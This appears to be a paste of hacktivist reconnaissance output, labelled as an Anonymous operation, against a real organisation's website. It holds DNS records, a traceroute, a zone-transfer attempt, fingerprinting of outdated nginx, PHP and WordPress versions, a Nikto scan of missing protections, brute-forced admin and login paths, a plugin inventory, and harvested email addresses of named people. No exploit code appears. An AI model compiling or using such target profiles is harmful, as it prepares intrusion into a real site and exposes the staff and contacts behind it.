- mail.yourhostingaccount.com MX 65.254.254.52
- mail.yourhostingaccount.com MX 65.254.254.53
- mail.yourhostingaccount.com MX 65.254.254.54
- mail.yourhostingaccount.com MX 65.254.254.55
- mail.yourhostingaccount.com MX 65.254.254.56
- mail.yourhostingaccount.com MX 65.254.254.57
- mail.yourhostingaccount.com MX 65.254.254.58
- fns2.dnspark.net NS 192.184.90.32
- fns1.dnspark.net NS 2001:1850:1:0:107::d
- fns2.dnspark.net NS 2604:180:1::f02f:2c21
- fns1.dnspark.net NS 66.55.82.13
- fns1.dnspark.net SOA 66.55.82.13
- njoathkeepers.org TXT v=spf1 include:servers.mcsv.net ?all
- Subdomains (1)
- =======================================================================================================================================
- www.njoathkeepers.org 192.155.88.60
- Loadbalancing
- =======================================================================================================================================
- Checking for DNS-Loadbalancing:
- NOT FOUND
- Checking for HTTP-Loadbalancing [Server]:
- nginx/1.8.1
- NOT FOUND
- Checking for HTTP-Loadbalancing [Date]:
- 11:22:33, 11:22:34, 11:22:35, 11:22:37, 11:22:38, 11:22:39, 11:22:40, 11:22:41, 11:22:43, 11:22:44,
- 11:22:45, 11:22:46, 11:22:47, 11:22:48, 11:22:49, 11:22:50, 11:22:51, 11:22:52, 11:22:53, 11:22:54,
- 11:22:56, 11:22:57, 11:22:58, 11:22:59, 11:23:00, 11:23:01, 11:23:02, 11:23:02, 11:23:03, 11:23:04,
- 11:23:05, 11:23:06, 11:23:06, 11:23:07, 11:23:08, 11:23:09, 11:23:11, 11:23:12, 11:23:13, 11:23:14,
- 11:23:15, 11:23:16, 11:23:17, 11:23:18, 11:23:19, 11:23:20, 11:23:21, 11:23:22, 11:23:23, 11:23:24,
- NOT FOUND
- Checking for HTTP-Loadbalancing [Diff]:
- NOT FOUND
- ICMP ECHO
- 1 public-gw.vpngate.net (10.211.254.254)
- 2 mynetwork (192.168.2.1)
- 3 10.11.7.65 (10.11.7.65)
- 4 10.178.206.72 (10.178.206.72)
- 5 10.178.206.73 (10.178.206.73)
- 6 tcore4-toronto12_2-4-0-0_.net.bell.ca (64.230.104.164)
- 7 tcore2-torontoxn_ae0.net.bell.ca (64.230.51.156)
- 8 bx1-torontoxn_et4-0-0.net.bell.ca (64.230.97.159)
- 9 ix-ae-9-0.tcore2.tnk-toronto.as6453.net (63.243.172.25)
- 10 if-ae-2-2.tcore1.tnk-toronto.as6453.net (64.86.33.89)
- 11 if-ae-25-2.tcore1.ttt-toronto.as6453.net (64.86.33.103)
- 12 if-ae-10-2.tcore2.ttt-toronto.as6453.net (64.86.32.34)
- 13 if-ae-5-3.tcore1.aeq-ashburn.as6453.net (64.86.85.2)
- 14 if-ae-2-2.tcore2.aeq-ashburn.as6453.net (216.6.87.1)
- 15 if-ae-12-2.tcore4.njy-newark.as6453.net (216.6.87.201)
- 16 66.198.111.166 (66.198.111.166)
- 17 173.255.239.21 (173.255.239.21)
- 18 mail.nycpatriot.org (192.155.88.60)
- TCP SYN
- 1 mail.nycpatriot.org (192.155.88.60)
- Zone Transfer
- =======================================================================================================================================
- Resolving SOA Record
- SOA fns1.dnspark.net 66.55.82.13
- Resolving NS Records
- NS fns2.dnspark.net 192.184.90.32
- NS fns2.dnspark.net 2604:180:1::f02f:2c21
- NS fns1.dnspark.net 66.55.82.13
- NS fns1.dnspark.net 2001:1850:1:0:107::d
- Trying NS server 192.184.90.32
- No answer or RRset not for qname
- Trying NS server 66.55.82.13
- Trying NS server 2604:180:1::f02f:2c21
- Trying NS server 2001:1850:1:0:107::d
- Whatweb
- =======================================================================================================================================
- www.njoathkeepers.org [200 OK] Cookies[PHPSESSID]
- HTTPServer[nginx/1.8.1]
- IP[192.155.88.60]
- JQuery[1.12.4]
- MetaGenerator[WordPress 4.9.8]
- PHP[5.5.38-1~dotdeb+7.1]
- Script[text/javascript]
- Title[New Jersey Oath Keepers]
- UncommonHeaders[link]
- WordPress[4.9.8]
- X-Powered-By[PHP/5.5.38-1~dotdeb+7.1]
- nginx[1.8.1]
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 192.155.88.60
- + Target Hostname: www.njoathkeepers.org
- + Target Port: 80
- + Start Time: 2018-08-15 07:10:59 (GMT-4)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: nginx/1.8.1
- + Cookie PHPSESSID created without the httponly flag
- + Retrieved x-powered-by header: PHP/5.5.38-1~dotdeb+7.1
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'link' found, with contents: <http://www.njoathkeepers.org/>; rel=shortlink
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x59247b49 0x1d7
- + "robots.txt" contains 13 entries which should be manually viewed.
- + OSVDB-10944: /cgi.cgi/: CGI Directory found
- + OSVDB-10944: /webcgi/: CGI Directory found
- + OSVDB-10944: /cgi-914/: CGI Directory found
- + OSVDB-10944: /cgi-915/: CGI Directory found
- + OSVDB-10944: /bin/: CGI Directory found
- + OSVDB-10944: /cgi/: CGI Directory found
- + OSVDB-10944: /mpcgi/: CGI Directory found
- + OSVDB-10944: /cgi-bin/: CGI Directory found
- + OSVDB-10944: /ows-bin/: CGI Directory found
- + OSVDB-10944: /cgi-sys/: CGI Directory found
- + OSVDB-10944: /cgi-local/: CGI Directory found
- + OSVDB-10944: /htbin/: CGI Directory found
- + OSVDB-10944: /cgibin/: CGI Directory found
- + OSVDB-10944: /cgis/: CGI Directory found
- + OSVDB-10944: /scripts/: CGI Directory found
- + OSVDB-10944: /cgi-win/: CGI Directory found
- + OSVDB-10944: /fcgi-bin/: CGI Directory found
- + OSVDB-10944: /cgi-exe/: CGI Directory found
- + OSVDB-10944: /cgi-home/: CGI Directory found
- + OSVDB-10944: /cgi-perl/: CGI Directory found
- + OSVDB-10944: /scgi-bin/: CGI Directory found
- + OSVDB-10944: /cgi-bin-sdb/: CGI Directory found
- + OSVDB-10944: /cgi-mod/: CGI Directory found
- + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
- + /wp-links-opml.php: This WordPress script reveals the installed version.
- + OSVDB-3092: /license.txt: License file found may identify site software.
- + /wp-app.log: Wordpress' wp-app.log may leak application/system details.
- + /wordpress/: A Wordpress installation was found.
- + Cookie wordpress_test_cookie created without the httponly flag
- + /wp-login.php: Wordpress login found
- + 26160 requests: 0 error(s) and 38 item(s) reported on remote host
- + End Time: 2018-08-15 10:50:39 (GMT-4) (13180 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- =======================================================================================================================================
- | [*] http://njoathkeepers.org/ redirected to http://www.njoathkeepers.org/
- | [*] New target is: http://www.njoathkeepers.org/
- =======================================================================================================================================
- | Domain: http://www.njoathkeepers.org/
- | Server: nginx/1.8.1
- | IP: 192.155.88.60=
- |
- | Directory check:
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/Login/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/about/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/ad/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/admin/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/br/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/calendar/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/ca/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/cal/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/dashboard/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/ed/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/embed/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/event/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/feed/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/forgot/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/for/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/fun/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/go/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/ja/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/join/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/login/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/log/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/mail/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/mailing/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/members/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/member/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/memb/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/mem/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/new/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/pe/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/people/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/press/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/rss/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/send/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/som/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/st/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/supp/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/support/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/the/
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/wp-admin/
- =======================================================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/admin/index.php
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/cgi-bin/calendar
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/cgi-bin/mail
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/favicon.ico
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/index.php
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/license.txt
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/readme.html
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/robots.txt
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/htx/sqlqhit.asp
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/htx/SQLQHit.asp
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/sqlqhit.asp
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/SQLQHit.asp
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/vgn/login
- | [+] CODE: 200 URL: http://www.njoathkeepers.org/wp-content/plugins/akismet/readme.txt
- =======================================================================================================================================
- |
- | Check robots.txt:
- | [+] User-agent: *
- | [+] Disallow: /calendar/action~posterboard/
- | [+] Disallow: /calendar/action~agenda/
- | [+] Disallow: /calendar/action~oneday/
- | [+] Disallow: /calendar/action~month/
- | [+] Disallow: /calendar/action~week/
- | [+] Disallow: /calendar/action~stream/
- | [+] Disallow: /calendar/action~undefined/
- | [+] Disallow: /calendar/action~http:/
- | [+] Disallow: /calendar/action~default/
- | [+] Disallow: /calendar/action~poster/
- | [+] Disallow: /calendar/action~*/
- | [+] Disallow: /*controller=ai1ec_exporter_controller*
- | [+] Disallow: /*/action~*/
- #######################################################################################################################################
- | External hosts:
- | [+] External Host Found: https://secure.php.net
- | [+] External Host Found: http://irc.nycpatriot.org
- | [+] External Host Found: https://www.mysql.com
- | [+] External Host Found: http://www.actforamerica.org
- | [+] External Host Found: http://www.kidsguidenj.com
- | [+] External Host Found: http://www.daveyspub.com
- | [+] External Host Found: http://gotenna.com
- | [+] External Host Found: https://www.google.com
- | [+] External Host Found: http://maps.googleapis.com
- | [+] External Host Found: http://www.youtube.com
- | [+] External Host Found: http://www.philly.com
- | [+] External Host Found: http://www.meetup.com
- | [+] External Host Found: http://www.somersetcounty4h.org
- | [+] External Host Found: https://twitter.com
- | [+] External Host Found: http://oathkeepers.org
- | [+] External Host Found: http://eepurl.com
- | [+] External Host Found: https://www.facebook.com
- | [+] External Host Found: http://njfirearms.com
- | [+] External Host Found: https://wordpress.org
- | [+] External Host Found: https://www.change.org
- | [+] External Host Found: http://gmpg.org
- | [+] External Host Found: https://planet.wordpress.org
- | [+] External Host Found: https://codex.wordpress.org
- | [+] External Host Found: https://developer.wordpress.org
- | [+] External Host Found: https://httpd.apache.org
- | [+] External Host Found: https://www.paypal.com
- |
- | FCKeditor File Upload:
- |
- | File Upload Forms:
- |
- | E-mails:
- | [+] E-mail Found: stepman@njoathkeepers.org
- | [+] E-mail Found: secretary@njoathkeepers.org
- | [+] E-mail Found: forum@njoathkeepers.org
- | [+] E-mail Found: gloucester@njoathkeepers.org
- | [+] E-mail Found: dwhite@actforamerica.org
- | [+] E-mail Found: m@tidakada.com
- | [+] E-mail Found: josephhakim@internationchristianunion.org
- | [+] E-mail Found: kids@kidsguidenj.com
- | [+] E-mail Found: pio@njoathkeepers.org
- | [+] E-mail Found: cpt@njoathkeepers.org
- | [+] E-mail Found: communications@njoathkeepers.org
- | [+] E-mail Found: ohn@newyorkoathkeeper.com
- | [+] E-mail Found: donations@americanbedrockfoundation.org
- | [+] E-mail Found: regional-north@njoathkeepers.org
- ######################################################################################################################################
- | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/js/script.min.js?ver=2.1
- | http://www.njoathkeepers.org/wp-content/uploads/2013/12/wbai-20131230.mp3
- | http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3
- | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/moment.min.js?ver=1
- | http://www.njoathkeepers.org/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=4.9.8
- | http://www.njoathkeepers.org/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1
- | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/css/fullcalendar.min.css?ver=3.7.3
- | http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/includes/css/pta-contact-form.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-includes/css/dashicons.min.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-includes/css/buttons.min.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/css/style_login_widget.css?ver=4.9.8
- | http://www.njoathkeepers.org//www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/css/ai1ec_parsed_css.css?ver=2.5.32
- | http://www.njoathkeepers.org/wp-admin/css/install.min.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/js/jquery.validate.min.js?ver=1.13.1
- | http://www.njoathkeepers.org/wp-content/plugins/tablepress/js/jquery.datatables.min.js?ver=1.9
- | http://www.njoathkeepers.org/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1
- | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/qtip2.js?ver=3.7.3
- | http://www.njoathkeepers.org/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4
- | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/event-manager.min.js?ver=3.7.3
- | http://www.njoathkeepers.org/wp-includes/js/wp-embed.min.js?ver=4.9.8
- | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4
- | http://www.njoathkeepers.org/wp-content/uploads/2013/12/wbai-20131230.mp3?_=1
- | http://www.njoathkeepers.org/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=4.9.8
- | http://www.njoathkeepers.org/wp-includes/js/jquery/jquery.js?ver=1.12.4
- | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/fullcalendar.min.js?ver=3.7.3
- | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/css/normalize.min.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-admin/css/ie.min.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/widget/es-widget.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-content/plugins/taskfreak/js/front.js?ver=4.9.8
- | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4
- | http://www.njoathkeepers.org/wp-content/plugins/shortcodes-ultimate/assets/css/media-shortcodes.css?ver=5.0.4
- | http://www.njoathkeepers.org/wp-content/tablepress-combined.min.css?ver=38
- | http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/js/jquery.validate.min.js?ver=4.9.8
- | http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3
- | http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/js/additional-methods.js?ver=4.9.8
- | http://www.njoathkeepers.org/wp-admin/css/install.css?ver=20100228
- | http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/public/js_cache/calendar.js?ver=2.5.32
- | http://www.njoathkeepers.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
- | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/css/forms.min.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/css/style.min.css?ver=2.1
- | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/frontend.min.js?ver=3.7.3
- | http://www.njoathkeepers.org/wp-content/plugins/taskfreak/css/front.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/maps/googlemaps-adapter.js?ver=3.7.3
- | http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/style.css?ver=4.9.8
- | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4
- | http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/widget/es-widget-page.js?ver=4.9.8
- | http://www.njoathkeepers.org/wp-includes/wlwmanifest.xml
- | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/css/eventorganiser-front-end.min.css?ver=3.7.3
- | http://www.njoathkeepers.org//ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css?ver=4.9.8
- =======================================================================================================================================
- #######################################################################################################################################
- Anonymous JTSEC #OpDomesticTerrorism Full Recon #9
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement